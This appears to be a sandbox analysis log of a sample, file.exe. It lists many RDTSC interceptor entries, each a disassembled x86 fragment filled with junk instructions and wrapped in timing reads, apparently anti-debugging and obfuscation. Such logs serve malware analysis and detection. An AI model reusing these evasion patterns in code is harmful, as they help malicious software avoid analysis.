Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A075B second address: 51A077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FA1ECFCB29Fh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A077C second address: 51A0780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A044B second address: 51A04EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov al, dh 0x0000000d mov ah, 4Bh 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FA1ECFCB2A1h 0x00000018 sbb si, 6246h 0x0000001d jmp 00007FA1ECFCB2A1h 0x00000022 popfd 0x00000023 call 00007FA1ECFCB2A0h 0x00000028 mov ax, D101h 0x0000002c pop esi 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FA1ECFCB2A6h 0x00000039 adc cx, 1948h 0x0000003e jmp 00007FA1ECFCB29Bh 0x00000043 popfd 0x00000044 jmp 00007FA1ECFCB2A8h 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A04EE second address: 51A0555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1ED006911h 0x00000009 sbb cx, 0D16h 0x0000000e jmp 00007FA1ED006911h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FA1ED006910h 0x0000001a add al, 00000038h 0x0000001d jmp 00007FA1ED00690Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FA1ED006915h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0330 second address: 51B0334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0334 second address: 51B033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B033A second address: 51B0369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA1ECFCB2A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, A2h 0x00000015 mov edx, 305809ACh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0369 second address: 51B03D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1ED006910h 0x00000009 jmp 00007FA1ED006915h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FA1ED006910h 0x00000015 sub ax, D628h 0x0000001a jmp 00007FA1ED00690Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov dx, 6B96h 0x0000002b call 00007FA1ED006917h 0x00000030 pop esi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B03D9 second address: 51B0452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov cx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f call 00007FA1ECFCB2A9h 0x00000014 pushfd 0x00000015 jmp 00007FA1ECFCB2A0h 0x0000001a xor si, FD48h 0x0000001f jmp 00007FA1ECFCB29Bh 0x00000024 popfd 0x00000025 pop esi 0x00000026 jmp 00007FA1ECFCB2A9h 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007FA1ECFCB29Fh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0D2B second address: 51E0D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0D30 second address: 51E0D35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0D35 second address: 51E0DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA1ED006913h 0x0000000a or si, 484Eh 0x0000000f jmp 00007FA1ED006919h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FA1ED006911h 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FA1ED00690Eh 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA1ED006917h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0DAB second address: 51E0DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov al, bl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, di 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C05C2 second address: 51C0604 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA1ED00690Bh 0x00000008 add ecx, 6744A98Eh 0x0000000e jmp 00007FA1ED006919h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA1ED00690Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A063E second address: 51A0644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0644 second address: 51A064A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A064A second address: 51A064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A064E second address: 51A065D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A065D second address: 51A0661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0661 second address: 51A0667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0667 second address: 51A066D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A066D second address: 51A0671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0671 second address: 51A06A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA1ECFCB2A5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A06A2 second address: 51A06A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C00C0 second address: 51C00D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ECFCB29Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C00D0 second address: 51C010B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FA1ED00690Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ebx, 1F4432F0h 0x00000019 call 00007FA1ED006919h 0x0000001e pop esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C033E second address: 51C03C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1ECFCB2A7h 0x00000009 jmp 00007FA1ECFCB2A3h 0x0000000e popfd 0x0000000f call 00007FA1ECFCB2A8h 0x00000014 pop esi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FA1ECFCB29Eh 0x0000001e mov dword ptr [esp], ebp 0x00000021 jmp 00007FA1ECFCB2A0h 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA1ECFCB2A7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C03C6 second address: 51C03CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C03CC second address: 51C03D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0759 second address: 51E075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E075F second address: 51E0796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA25ED0E495h 0x0000000e pushad 0x0000000f mov ax, di 0x00000012 mov dh, A7h 0x00000014 popad 0x00000015 mov ecx, eax 0x00000017 pushad 0x00000018 movzx eax, dx 0x0000001b mov edi, 7B92714Eh 0x00000020 popad 0x00000021 xor eax, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA1ECFCB2A1h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0796 second address: 51E079B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E079B second address: 51E07AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and ecx, 1Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E07AE second address: 51E07B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E07B2 second address: 51E07C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E07C2 second address: 51E07F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ror eax, cl 0x0000000d jmp 00007FA1ED006914h 0x00000012 leave 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA1ED00690Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E07F2 second address: 51E07F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E07F6 second address: 51E07FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E07FC second address: 51E0820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 mov si, B2FFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c retn 0004h 0x0000000f nop 0x00000010 mov esi, eax 0x00000012 lea eax, dword ptr [ebp-08h] 0x00000015 xor esi, dword ptr [007A2014h] 0x0000001b push eax 0x0000001c push eax 0x0000001d push eax 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 push eax 0x00000022 call 00007FA1F1A4BAB1h 0x00000027 push FFFFFFFEh 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FA1ECFCB2A1h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0820 second address: 51E0826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0826 second address: 51E082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E082A second address: 51E082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E082E second address: 51E083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movsx ebx, si 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E083D second address: 51E0865 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 48AA9B73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dh, al 0x0000000b popad 0x0000000c ret 0x0000000d nop 0x0000000e push eax 0x0000000f call 00007FA1F1A87159h 0x00000014 mov edi, edi 0x00000016 pushad 0x00000017 pushad 0x00000018 mov dx, cx 0x0000001b mov dx, ax 0x0000001e popad 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FA1ED00690Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0865 second address: 51E0874 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190008 second address: 519000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519000C second address: 5190022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190022 second address: 5190094 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f mov cx, di 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 mov ecx, edi 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop esi 0x0000001c popad 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 jmp 00007FA1ED006916h 0x00000026 push esi 0x00000027 mov si, di 0x0000002a pop edi 0x0000002b popad 0x0000002c and esp, FFFFFFF8h 0x0000002f jmp 00007FA1ED006918h 0x00000034 xchg eax, ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA1ED006917h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190094 second address: 51900E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FA1ECFCB2A7h 0x00000010 mov cx, BEDFh 0x00000014 pop ecx 0x00000015 mov dx, CA18h 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FA1ECFCB29Ah 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51900E1 second address: 519011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA1ED00690Bh 0x00000014 sub cl, FFFFFF8Eh 0x00000017 jmp 00007FA1ED006919h 0x0000001c popfd 0x0000001d mov ax, 8697h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519011D second address: 5190123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190123 second address: 5190127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190127 second address: 519012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519012B second address: 5190172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA1ED006917h 0x00000013 or ecx, 7EE4864Eh 0x00000019 jmp 00007FA1ED006919h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190172 second address: 51901D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FA1ECFCB29Eh 0x0000000b and si, 12C8h 0x00000010 jmp 00007FA1ECFCB29Bh 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebx, dword ptr [ebp+10h] 0x0000001a pushad 0x0000001b movzx ecx, bx 0x0000001e mov edx, 7BC6C1A4h 0x00000023 popad 0x00000024 push esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FA1ECFCB2A5h 0x0000002e and esi, 61608296h 0x00000034 jmp 00007FA1ECFCB2A1h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51901D8 second address: 51901F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED00690Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d push eax 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, 5B15A9E8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51901F6 second address: 5190250 instructions: 0x00000000 rdtsc 0x00000002 call 00007FA1ECFCB2A1h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov dl, B7h 0x00000011 mov si, BD65h 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007FA1ECFCB2A3h 0x00000022 xor ch, FFFFFF8Eh 0x00000025 jmp 00007FA1ECFCB2A9h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190250 second address: 5190261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 push esi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190261 second address: 5190265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190265 second address: 519026B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519026B second address: 5190345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov cx, C1B9h 0x00000010 mov cl, C0h 0x00000012 popad 0x00000013 mov bh, 5Ah 0x00000015 popad 0x00000016 test esi, esi 0x00000018 jmp 00007FA1ECFCB29Ah 0x0000001d je 00007FA25ED5960Ah 0x00000023 pushad 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 jmp 00007FA1ECFCB2A8h 0x0000002d popad 0x0000002e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000035 pushad 0x00000036 push edx 0x00000037 mov ah, 79h 0x00000039 pop edi 0x0000003a popad 0x0000003b je 00007FA25ED595EFh 0x00000041 pushad 0x00000042 call 00007FA1ECFCB29Eh 0x00000047 pushfd 0x00000048 jmp 00007FA1ECFCB2A2h 0x0000004d jmp 00007FA1ECFCB2A5h 0x00000052 popfd 0x00000053 pop esi 0x00000054 pushfd 0x00000055 jmp 00007FA1ECFCB2A1h 0x0000005a or esi, 44E20056h 0x00000060 jmp 00007FA1ECFCB2A1h 0x00000065 popfd 0x00000066 popad 0x00000067 mov edx, dword ptr [esi+44h] 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190345 second address: 5190349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190349 second address: 519034D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519034D second address: 5190353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190353 second address: 5190385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA1ECFCB2A7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190385 second address: 51903C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov ch, A1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 jmp 00007FA1ED006913h 0x00000016 jne 00007FA25ED94BE5h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA1ED006915h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903C6 second address: 51903CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903CC second address: 51903E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dl, cl 0x00000011 push edi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903E0 second address: 51903E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903E6 second address: 51903EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903EA second address: 51903EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903EE second address: 519042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FA25ED94BB1h 0x0000000e jmp 00007FA1ED00690Ch 0x00000013 test bl, 00000007h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FA1ED00690Eh 0x0000001d or ah, 00000058h 0x00000020 jmp 00007FA1ED00690Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5180739 second address: 5180775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA1ECFCB2A0h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA1ECFCB2A7h 0x00000018 rdtsc
